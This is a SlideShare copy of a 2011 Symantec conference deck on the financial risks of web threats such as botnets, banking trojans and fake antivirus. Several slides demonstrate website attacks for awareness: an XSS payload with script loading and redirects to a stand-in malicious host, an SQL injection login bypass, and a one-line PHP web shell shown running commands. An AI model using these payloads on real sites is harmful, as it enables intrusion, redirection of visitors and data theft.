SlideShare a Scribd company logo
1 of 34
Download to read offline
Costs and Financial Risks of Web Security

     Martin Lee CISSP CEng
     Dr. Les Pritchard CITP
SR B03 - Costs and Financial Risks of Web Security   1
Where the Threats Come From.

                                   Insider threats           Mostly accidental data deletion.




                                    Acts of God              Fire, flood, volcanos!




                                     Malicious outsiders     Malware, banking trojans.
                                     (cybercriminals)


SR B03 - Costs and Financial Risks of Web Security         SYMANTEC VISION 2011                 2
How the Bad Guys Make Money



SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   3
Anyone’s Computer or Your Computer?
                                                     Compromising any computer.
Botnets                                              Denial of service attacks.
                                                     Send spam.
                                                     Steal data.


                                                     Compromising any computer.
Banking trojans
                                                     Internet bank robbery.



                                                     Compromising specific systems.
Targeted attacks
                                                     Stealing high value data.



SR B03 - Costs and Financial Risks of Web Security         SYMANTEC VISION 2011       4
Making Money From Botnets – Sending Spam

 Traffic analysis of rogue website

 26 days, 350 million spams, 28 sales

 But, when scaled up
 ~$7000 in sales per day
 ~$2M per year




Source :
C. Kanich et al. “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”. Nov 2008
(http://www.icsi.berkeley.edu/pubs/networking/2008-ccs-spamalytics.pdf)

   SR B03 - Costs and Financial Risks of Web Security                              SYMANTEC VISION 2011   5
Making Money From Botnets – Denial of Service


Can hit 100Gb/sec attack traffic.

Estimated UK losses $3bn/yr.




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   6
Making Money From Banking Trojans




Source : http://www.wired.com/threatlevel/2010/10/zeus-ukraine-arrests/
      SR B03 - Costs and Financial Risks of Web Security                  SYMANTEC VISION 2011   7
Banking Trojans – Zeus Man-in-Browser Attack




Malware waits for log in to internet banking,
issues payments on your behalf to money mules.




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   8
Banking Trojans – Zeus Man-in-Browser Attack




 Malware intercepts data sent from bank,
 removes it’s transfers, adjusts balance,
 shows you what you expect to see.




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   9
Distributing Web Malware
                                                                   Gumblar Lifecycle


                                                                CONTROLS                  FORWARDS


Uploading web malware to your website
                                                                              XSS               MALWARE
by stealing your login details.                         HACKER              EXPLOIT              HOST
                                                      ADDS
                                                       XSS
                                                     EXPLOIT                        VISITS


                                                                   STEALS
                                                                    LOGIN


                                                                                               INSTALLS
                                                       UNAFECTED                               MALWARE
                                                        WEBSITE
                                                                                 VICTIM




SR B03 - Costs and Financial Risks of Web Security        SYMANTEC VISION 2011                            10
Malware on Legitimate Domains

Malicious domains lifecycle: % remaining active over time
100%
                                                                              Over time more than 80% of
                                                                                  malicious domains
                                                                                  are “Old” domains
 80%


                                          “Old” domains
 60%
                                                                                           80%
 40%
                                                          “New” Domains

 20%



 0%
       0                  30                   60           90             120             150             180
       Days




  SR B03 - Costs and Financial Risks of Web Security             SYMANTEC VISION 2011                       11
Employee Browsing Habits




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   12
Browsing Habits Outside of the Office
                          100
        % of web blocks


                           80


                           60
                                                                                           Mobile
                           40                                                              Office

                           20


                            0
                                20      40              60           80              100
                                                     % of users
SR B03 - Costs and Financial Risks of Web Security                SYMANTEC VISION 2011              13
Distributing Web Malware – Advertising Services

Subvert a legitimate website


                   WEB PAGE


                                                        Sold by sales team                  advertiser


                                                        Sold by reseller                    advertiser

                                                                                            Malware
                                                          resold further                    distributor

                                      Adverts



   SR B03 - Costs and Financial Risks of Web Security                SYMANTEC VISION 2011
Fake AV




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011
Fake AV



                                                                                               Do the maths –

                                                                                               1 million products sold
                                                                                               @$39.95

                                                                                               $8.2 million fine

                                                                                               = $31.75 million profit!




Source: http://www.pcworld.com/businesscenter/article/217987/alleged_scareware_vendors_to_pay_82_million_to_ftc.html
     SR B03 - Costs and Financial Risks of Web Security                     SYMANTEC VISION 2011
Attacking Your Website



SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   17
My Website – XSS Example




       www.example.com/index.php?page=cat&category=1&PHPSESSID=


SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   18
My Website – XSS Example

      Attack JS –
               "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
      URL encode it, replace ‘category’ value

    www.example.com/index.php?page=cat&category=1&PHPSESSID=

                                                 becomes

    www.example.com/index.php?page=cat&category=%3E%0A%3C%53%43%52%49




SR B03 - Costs and Financial Risks of Web Security         SYMANTEC VISION 2011   19
My Website – XSS Example




  Attacker can execute whatever they like:
    Exploit –     <script src=“http://www.malicious.com/attack.js”>
    Redirect – window.location.href = “http://www.malicious.com/“
    Why not? – document.product.price = “0.01”


SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   20
XSS Example – Click that link

Email containing link




                                                               WEB PAGE




Embed link in discussion page


                                                      ENTER TEXT          SUBMIT




                                                      I agree. <img src=“/images/smiley.gif”
                                                                   onload=“document.location=‘http://malicious/’”>


 SR B03 - Costs and Financial Risks of Web Security                   SYMANTEC VISION 2011                     21
SQL Injection – “Little Bobby Tables”




Source: XKCD Comic - http://xkcd.com/327/


 SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   22
My Website – SQL Injection Example
    SQL injection:

Select * from users where username = “$input” and password=md5($password);

$input = ‘ admin”; -- ‘

Select * from users where username = “admin”; -- ... ignored




 SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   23
My Website – SQL Injection Example



                                                     How about a file like this?

                                                     <? system($_REQUEST*‘cmd’+); ?>




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011              24
My Website – Now completely at mercy of attacker
http://www.example.com/images/shell.php?cmd=%6C%73%20%2D%6C

                                                              ls -l -> %6C%73%20%2D%6C

 total 36
 -rw-rw-r-- 1 martin martin 191 Nov 27 2003 categories.php
 drwxrwxr-x 2 martin martin 4096 Mar 16 17:53 inc
 -rw-rw-r-- 1 martin martin 543 Mar 29 14:54 index.old
 -rw-r--r-- 1 martin martin 124 Mar 29 15:03 index.php
 -rw-rw-r-- 1 martin martin 537 Mar 29 14:41 index.php~
 -rw-rw-r-- 1 martin martin 2068 Mar 29 16:20
 product_image.php
 -rw-rw-r-- 1 martin martin 1924 Nov 28 2003
 product_image.php~
 -rw-rw-r-- 1 martin martin 189 Nov 27 2003 products.php
 -rw-r--r-- 1 martin martin 31 Mar 29 15:04 shell.php




SR B03 - Costs and Financial Risks of Web Security           SYMANTEC VISION 2011        25
Vulnerable Websites




 Skilled attackers can easily find vulnerabilities.

 Others can use a list of vulnerable websites.




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   26
How You Lose Money



SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   27
Data Breach Losses
 • Ponemon Institute & Symantec Research
     – Average cost per data breach $7.2 million.
     – $214 per breached record.


     – 31% of breaches are malicious or criminal attack.
     – Malicious attacks cost more $318 per breached record.



See: http://www.symantec.com/about/news/release/article.jsp?prid=20110308_01
Calculate your risk: http://databreachcalculator.com/



 SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   28
Symantec SMB Survey – What do SMBs suffer?
 60%
                                                                            Environment downtime
 50%
                                                                            Corporate data theft
 40%
                                                                            Customer or employee
 30%                                                                        PI theft

                                                                            Customer financial
 20%                                                                        information theft

                                                                            Intellectual property
 10%                                                                        theft


   0%




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011                        29
Protecting Yourself.



SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   30
Know Your Assets, Know Attack Vectors




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   31
Layers of Protection Provide Maximum Detection




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011   32
Test & Monitor Your Web Services

                                                             Find & fix vulnerabilities in
                                                             your web services.
                                                             Monitor logs to identify attacks,
                                                             block attacker.

                                                             You don’t need to be perfect,
                                                             just better than your
                                                             competitors.




SR B03 - Costs and Financial Risks of Web Security   SYMANTEC VISION 2011                33
Thank you!
    Martin Lee
    Martin_lee@symantec.com
    +44 1452 627 042


    Copyright © 2011 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in
    the U.S. and other countries. Other names may be trademarks of their respective owners.

    This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied,
    are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.


SR B03 - Costs and Financial Risks of Web Security                                                                                                                                          34

More Related Content

Viewers also liked

Symantec Advances Enterprise Mobility Strategy
Symantec Advances Enterprise Mobility StrategySymantec Advances Enterprise Mobility Strategy
Symantec Advances Enterprise Mobility StrategySymantec
 
Tokoh pelaut dunia
Tokoh pelaut duniaTokoh pelaut dunia
Tokoh pelaut duniaMachrip Aziz
 
Evaluating Risks of Cloud Based Services
Evaluating Risks of Cloud Based ServicesEvaluating Risks of Cloud Based Services
Evaluating Risks of Cloud Based ServicesSymantec
 
Owf 2010 Presentation For Program Committee
Owf 2010   Presentation For Program CommitteeOwf 2010   Presentation For Program Committee
Owf 2010 Presentation For Program CommitteeAlexis Monville
 
Enhancing Authentication to Secure the Open Enterprise
Enhancing Authentication to Secure the Open EnterpriseEnhancing Authentication to Secure the Open Enterprise
Enhancing Authentication to Secure the Open EnterpriseSymantec
 
Symantec Ubiquity
Symantec UbiquitySymantec Ubiquity
Symantec UbiquitySymantec
 

Viewers also liked (8)

Symantec Advances Enterprise Mobility Strategy
Symantec Advances Enterprise Mobility StrategySymantec Advances Enterprise Mobility Strategy
Symantec Advances Enterprise Mobility Strategy
 
Tokoh pelaut dunia
Tokoh pelaut duniaTokoh pelaut dunia
Tokoh pelaut dunia
 
Open Development
Open DevelopmentOpen Development
Open Development
 
Evaluating Risks of Cloud Based Services
Evaluating Risks of Cloud Based ServicesEvaluating Risks of Cloud Based Services
Evaluating Risks of Cloud Based Services
 
Projetos
ProjetosProjetos
Projetos
 
Owf 2010 Presentation For Program Committee
Owf 2010   Presentation For Program CommitteeOwf 2010   Presentation For Program Committee
Owf 2010 Presentation For Program Committee
 
Enhancing Authentication to Secure the Open Enterprise
Enhancing Authentication to Secure the Open EnterpriseEnhancing Authentication to Secure the Open Enterprise
Enhancing Authentication to Secure the Open Enterprise
 
Symantec Ubiquity
Symantec UbiquitySymantec Ubiquity
Symantec Ubiquity
 

Similar to Financial Risks to Internet Security

Security Challenges in the Virtualized World IBM Virtual Server Protection fo...
Security Challenges in the Virtualized World IBM Virtual Server Protection fo...Security Challenges in the Virtualized World IBM Virtual Server Protection fo...
Security Challenges in the Virtualized World IBM Virtual Server Protection fo...Digicomp Academy AG
 
Symantec Website Security Threat Report
Symantec Website Security Threat ReportSymantec Website Security Threat Report
Symantec Website Security Threat Reportcheinyeanlim
 
Trusteer Rapport – Browser Security - How It Works
Trusteer Rapport – Browser Security - How It WorksTrusteer Rapport – Browser Security - How It Works
Trusteer Rapport – Browser Security - How It Workstrusteer
 
Next-Gen Security (using Cloud)
Next-Gen Security (using Cloud)Next-Gen Security (using Cloud)
Next-Gen Security (using Cloud)Jim Kaskade
 
2013 Cisco Annual Security Report
2013 Cisco Annual Security Report2013 Cisco Annual Security Report
2013 Cisco Annual Security ReportCisco Security
 
גיא אילון Websense
גיא אילון   Websenseגיא אילון   Websense
גיא אילון Websenselihig
 
Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentationParab Mishra
 
parabcswithout-front-200320113631.pdf
parabcswithout-front-200320113631.pdfparabcswithout-front-200320113631.pdf
parabcswithout-front-200320113631.pdfNirGoldstein5
 
CIS 2015 Security Without Borders: Taming the Cloud and Mobile Frontier - And...
CIS 2015 Security Without Borders: Taming the Cloud and Mobile Frontier - And...CIS 2015 Security Without Borders: Taming the Cloud and Mobile Frontier - And...
CIS 2015 Security Without Borders: Taming the Cloud and Mobile Frontier - And...CloudIDSummit
 
Owasp e crime-london-2012-final
Owasp e crime-london-2012-finalOwasp e crime-london-2012-final
Owasp e crime-london-2012-finalMarco Morana
 
Combating Constantly Evolving Advanced Threats – Solution Architecture
Combating Constantly Evolving Advanced Threats – Solution ArchitectureCombating Constantly Evolving Advanced Threats – Solution Architecture
Combating Constantly Evolving Advanced Threats – Solution ArchitectureIBM Sverige
 
分会场八云及虚拟环境安全防护
分会场八云及虚拟环境安全防护分会场八云及虚拟环境安全防护
分会场八云及虚拟环境安全防护ITband
 
Cyber Risk Management in the New Digitalisation Age - eSentinel™
Cyber Risk Management in the New Digitalisation Age - eSentinel™ Cyber Risk Management in the New Digitalisation Age - eSentinel™
Cyber Risk Management in the New Digitalisation Age - eSentinel™ Netpluz Asia Pte Ltd
 
Online Security and Privacy Issues
Online Security and Privacy IssuesOnline Security and Privacy Issues
Online Security and Privacy Issuesebusinessmantra
 
Introduction - The Smart Protection Network
Introduction - The Smart Protection NetworkIntroduction - The Smart Protection Network
Introduction - The Smart Protection NetworkAndrew Wong
 

Similar to Financial Risks to Internet Security (20)

Security Challenges in the Virtualized World IBM Virtual Server Protection fo...
Security Challenges in the Virtualized World IBM Virtual Server Protection fo...Security Challenges in the Virtualized World IBM Virtual Server Protection fo...
Security Challenges in the Virtualized World IBM Virtual Server Protection fo...
 
Symantec Website Security Threat Report
Symantec Website Security Threat ReportSymantec Website Security Threat Report
Symantec Website Security Threat Report
 
Mobile Security
Mobile Security Mobile Security
Mobile Security
 
Mobile Security
Mobile Security Mobile Security
Mobile Security
 
Trusteer Rapport – Browser Security - How It Works
Trusteer Rapport – Browser Security - How It WorksTrusteer Rapport – Browser Security - How It Works
Trusteer Rapport – Browser Security - How It Works
 
Blind XSS & Click Jacking
Blind XSS & Click JackingBlind XSS & Click Jacking
Blind XSS & Click Jacking
 
Next-Gen Security (using Cloud)
Next-Gen Security (using Cloud)Next-Gen Security (using Cloud)
Next-Gen Security (using Cloud)
 
2013 Cisco Annual Security Report
2013 Cisco Annual Security Report2013 Cisco Annual Security Report
2013 Cisco Annual Security Report
 
גיא אילון Websense
גיא אילון   Websenseגיא אילון   Websense
גיא אילון Websense
 
Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentation
 
parabcswithout-front-200320113631.pdf
parabcswithout-front-200320113631.pdfparabcswithout-front-200320113631.pdf
parabcswithout-front-200320113631.pdf
 
Nebezpecny Internet Novejsi Verze
Nebezpecny Internet Novejsi VerzeNebezpecny Internet Novejsi Verze
Nebezpecny Internet Novejsi Verze
 
CIS 2015 Security Without Borders: Taming the Cloud and Mobile Frontier - And...
CIS 2015 Security Without Borders: Taming the Cloud and Mobile Frontier - And...CIS 2015 Security Without Borders: Taming the Cloud and Mobile Frontier - And...
CIS 2015 Security Without Borders: Taming the Cloud and Mobile Frontier - And...
 
Owasp e crime-london-2012-final
Owasp e crime-london-2012-finalOwasp e crime-london-2012-final
Owasp e crime-london-2012-final
 
Combating Constantly Evolving Advanced Threats – Solution Architecture
Combating Constantly Evolving Advanced Threats – Solution ArchitectureCombating Constantly Evolving Advanced Threats – Solution Architecture
Combating Constantly Evolving Advanced Threats – Solution Architecture
 
分会场八云及虚拟环境安全防护
分会场八云及虚拟环境安全防护分会场八云及虚拟环境安全防护
分会场八云及虚拟环境安全防护
 
Cyber Risk Management in the New Digitalisation Age - eSentinel™
Cyber Risk Management in the New Digitalisation Age - eSentinel™ Cyber Risk Management in the New Digitalisation Age - eSentinel™
Cyber Risk Management in the New Digitalisation Age - eSentinel™
 
Online Security and Privacy Issues
Online Security and Privacy IssuesOnline Security and Privacy Issues
Online Security and Privacy Issues
 
Introduction - The Smart Protection Network
Introduction - The Smart Protection NetworkIntroduction - The Smart Protection Network
Introduction - The Smart Protection Network
 
Data Leakage Prevention - K. K. Mookhey
Data Leakage Prevention - K. K. MookheyData Leakage Prevention - K. K. Mookhey
Data Leakage Prevention - K. K. Mookhey
 

More from Symantec

Symantec Enterprise Security Products are now part of Broadcom
Symantec Enterprise Security Products are now part of BroadcomSymantec Enterprise Security Products are now part of Broadcom
Symantec Enterprise Security Products are now part of BroadcomSymantec
 
Symantec Webinar | National Cyber Security Awareness Month: Fostering a Secur...
Symantec Webinar | National Cyber Security Awareness Month: Fostering a Secur...Symantec Webinar | National Cyber Security Awareness Month: Fostering a Secur...
Symantec Webinar | National Cyber Security Awareness Month: Fostering a Secur...Symantec
 
Symantec Webinar | National Cyber Security Awareness Month: Protect IT
Symantec Webinar | National Cyber Security Awareness Month: Protect ITSymantec Webinar | National Cyber Security Awareness Month: Protect IT
Symantec Webinar | National Cyber Security Awareness Month: Protect ITSymantec
 
Symantec Webinar | National Cyber Security Awareness Month: Secure IT
Symantec Webinar | National Cyber Security Awareness Month: Secure ITSymantec Webinar | National Cyber Security Awareness Month: Secure IT
Symantec Webinar | National Cyber Security Awareness Month: Secure ITSymantec
 
Symantec Webinar | National Cyber Security Awareness Month - Own IT
Symantec Webinar | National Cyber Security Awareness Month - Own ITSymantec Webinar | National Cyber Security Awareness Month - Own IT
Symantec Webinar | National Cyber Security Awareness Month - Own ITSymantec
 
Symantec Webinar: Preparing for the California Consumer Privacy Act (CCPA)
Symantec Webinar: Preparing for the California Consumer Privacy Act (CCPA)Symantec Webinar: Preparing for the California Consumer Privacy Act (CCPA)
Symantec Webinar: Preparing for the California Consumer Privacy Act (CCPA)Symantec
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec
 
Symantec Mobile Security Webinar
Symantec Mobile Security WebinarSymantec Mobile Security Webinar
Symantec Mobile Security WebinarSymantec
 
Symantec Webinar Cloud Security Threat Report
Symantec Webinar Cloud Security Threat ReportSymantec Webinar Cloud Security Threat Report
Symantec Webinar Cloud Security Threat ReportSymantec
 
Symantec Cloud Security Threat Report
Symantec Cloud Security Threat ReportSymantec Cloud Security Threat Report
Symantec Cloud Security Threat ReportSymantec
 
Symantec Webinar | Security Analytics Breached! Next Generation Network Foren...
Symantec Webinar | Security Analytics Breached! Next Generation Network Foren...Symantec Webinar | Security Analytics Breached! Next Generation Network Foren...
Symantec Webinar | Security Analytics Breached! Next Generation Network Foren...Symantec
 
Symantec Webinar | Implementing a Zero Trust Framework to Secure Modern Workf...
Symantec Webinar | Implementing a Zero Trust Framework to Secure Modern Workf...Symantec Webinar | Implementing a Zero Trust Framework to Secure Modern Workf...
Symantec Webinar | Implementing a Zero Trust Framework to Secure Modern Workf...Symantec
 
Symantec Webinar | Tips for Successful CASB Projects
Symantec Webinar |  Tips for Successful CASB ProjectsSymantec Webinar |  Tips for Successful CASB Projects
Symantec Webinar | Tips for Successful CASB ProjectsSymantec
 
Symantec Webinar: What Cyber Threats Are Lurking in Your Network?
Symantec Webinar: What Cyber Threats Are Lurking in Your Network?Symantec Webinar: What Cyber Threats Are Lurking in Your Network?
Symantec Webinar: What Cyber Threats Are Lurking in Your Network?Symantec
 
Symantec Webinar: GDPR 1 Year On
Symantec Webinar: GDPR 1 Year OnSymantec Webinar: GDPR 1 Year On
Symantec Webinar: GDPR 1 Year OnSymantec
 
Symantec ISTR 24 Webcast 2019
Symantec ISTR 24 Webcast 2019Symantec ISTR 24 Webcast 2019
Symantec ISTR 24 Webcast 2019Symantec
 
Symantec Best Practices for Cloud Security: Insights from the Front Lines
Symantec Best Practices for Cloud Security: Insights from the Front LinesSymantec Best Practices for Cloud Security: Insights from the Front Lines
Symantec Best Practices for Cloud Security: Insights from the Front LinesSymantec
 
Symantec - The Importance of Building Your Zero Trust Program on a Solid Plat...
Symantec - The Importance of Building Your Zero Trust Program on a Solid Plat...Symantec - The Importance of Building Your Zero Trust Program on a Solid Plat...
Symantec - The Importance of Building Your Zero Trust Program on a Solid Plat...Symantec
 
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...Symantec
 
Symantec Webinar Using Advanced Detection and MITRE ATT&CK to Cage Fancy Bear
Symantec Webinar Using Advanced Detection and MITRE ATT&CK to Cage Fancy BearSymantec Webinar Using Advanced Detection and MITRE ATT&CK to Cage Fancy Bear
Symantec Webinar Using Advanced Detection and MITRE ATT&CK to Cage Fancy BearSymantec
 

More from Symantec (20)

Symantec Enterprise Security Products are now part of Broadcom
Symantec Enterprise Security Products are now part of BroadcomSymantec Enterprise Security Products are now part of Broadcom
Symantec Enterprise Security Products are now part of Broadcom
 
Symantec Webinar | National Cyber Security Awareness Month: Fostering a Secur...
Symantec Webinar | National Cyber Security Awareness Month: Fostering a Secur...Symantec Webinar | National Cyber Security Awareness Month: Fostering a Secur...
Symantec Webinar | National Cyber Security Awareness Month: Fostering a Secur...
 
Symantec Webinar | National Cyber Security Awareness Month: Protect IT
Symantec Webinar | National Cyber Security Awareness Month: Protect ITSymantec Webinar | National Cyber Security Awareness Month: Protect IT
Symantec Webinar | National Cyber Security Awareness Month: Protect IT
 
Symantec Webinar | National Cyber Security Awareness Month: Secure IT
Symantec Webinar | National Cyber Security Awareness Month: Secure ITSymantec Webinar | National Cyber Security Awareness Month: Secure IT
Symantec Webinar | National Cyber Security Awareness Month: Secure IT
 
Symantec Webinar | National Cyber Security Awareness Month - Own IT
Symantec Webinar | National Cyber Security Awareness Month - Own ITSymantec Webinar | National Cyber Security Awareness Month - Own IT
Symantec Webinar | National Cyber Security Awareness Month - Own IT
 
Symantec Webinar: Preparing for the California Consumer Privacy Act (CCPA)
Symantec Webinar: Preparing for the California Consumer Privacy Act (CCPA)Symantec Webinar: Preparing for the California Consumer Privacy Act (CCPA)
Symantec Webinar: Preparing for the California Consumer Privacy Act (CCPA)
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
 
Symantec Mobile Security Webinar
Symantec Mobile Security WebinarSymantec Mobile Security Webinar
Symantec Mobile Security Webinar
 
Symantec Webinar Cloud Security Threat Report
Symantec Webinar Cloud Security Threat ReportSymantec Webinar Cloud Security Threat Report
Symantec Webinar Cloud Security Threat Report
 
Symantec Cloud Security Threat Report
Symantec Cloud Security Threat ReportSymantec Cloud Security Threat Report
Symantec Cloud Security Threat Report
 
Symantec Webinar | Security Analytics Breached! Next Generation Network Foren...
Symantec Webinar | Security Analytics Breached! Next Generation Network Foren...Symantec Webinar | Security Analytics Breached! Next Generation Network Foren...
Symantec Webinar | Security Analytics Breached! Next Generation Network Foren...
 
Symantec Webinar | Implementing a Zero Trust Framework to Secure Modern Workf...
Symantec Webinar | Implementing a Zero Trust Framework to Secure Modern Workf...Symantec Webinar | Implementing a Zero Trust Framework to Secure Modern Workf...
Symantec Webinar | Implementing a Zero Trust Framework to Secure Modern Workf...
 
Symantec Webinar | Tips for Successful CASB Projects
Symantec Webinar |  Tips for Successful CASB ProjectsSymantec Webinar |  Tips for Successful CASB Projects
Symantec Webinar | Tips for Successful CASB Projects
 
Symantec Webinar: What Cyber Threats Are Lurking in Your Network?
Symantec Webinar: What Cyber Threats Are Lurking in Your Network?Symantec Webinar: What Cyber Threats Are Lurking in Your Network?
Symantec Webinar: What Cyber Threats Are Lurking in Your Network?
 
Symantec Webinar: GDPR 1 Year On
Symantec Webinar: GDPR 1 Year OnSymantec Webinar: GDPR 1 Year On
Symantec Webinar: GDPR 1 Year On
 
Symantec ISTR 24 Webcast 2019
Symantec ISTR 24 Webcast 2019Symantec ISTR 24 Webcast 2019
Symantec ISTR 24 Webcast 2019
 
Symantec Best Practices for Cloud Security: Insights from the Front Lines
Symantec Best Practices for Cloud Security: Insights from the Front LinesSymantec Best Practices for Cloud Security: Insights from the Front Lines
Symantec Best Practices for Cloud Security: Insights from the Front Lines
 
Symantec - The Importance of Building Your Zero Trust Program on a Solid Plat...
Symantec - The Importance of Building Your Zero Trust Program on a Solid Plat...Symantec - The Importance of Building Your Zero Trust Program on a Solid Plat...
Symantec - The Importance of Building Your Zero Trust Program on a Solid Plat...
 
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
 
Symantec Webinar Using Advanced Detection and MITRE ATT&CK to Cage Fancy Bear
Symantec Webinar Using Advanced Detection and MITRE ATT&CK to Cage Fancy BearSymantec Webinar Using Advanced Detection and MITRE ATT&CK to Cage Fancy Bear
Symantec Webinar Using Advanced Detection and MITRE ATT&CK to Cage Fancy Bear
 

Recently uploaded

Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024SynarionITSolutions
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 

Recently uploaded (20)

Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
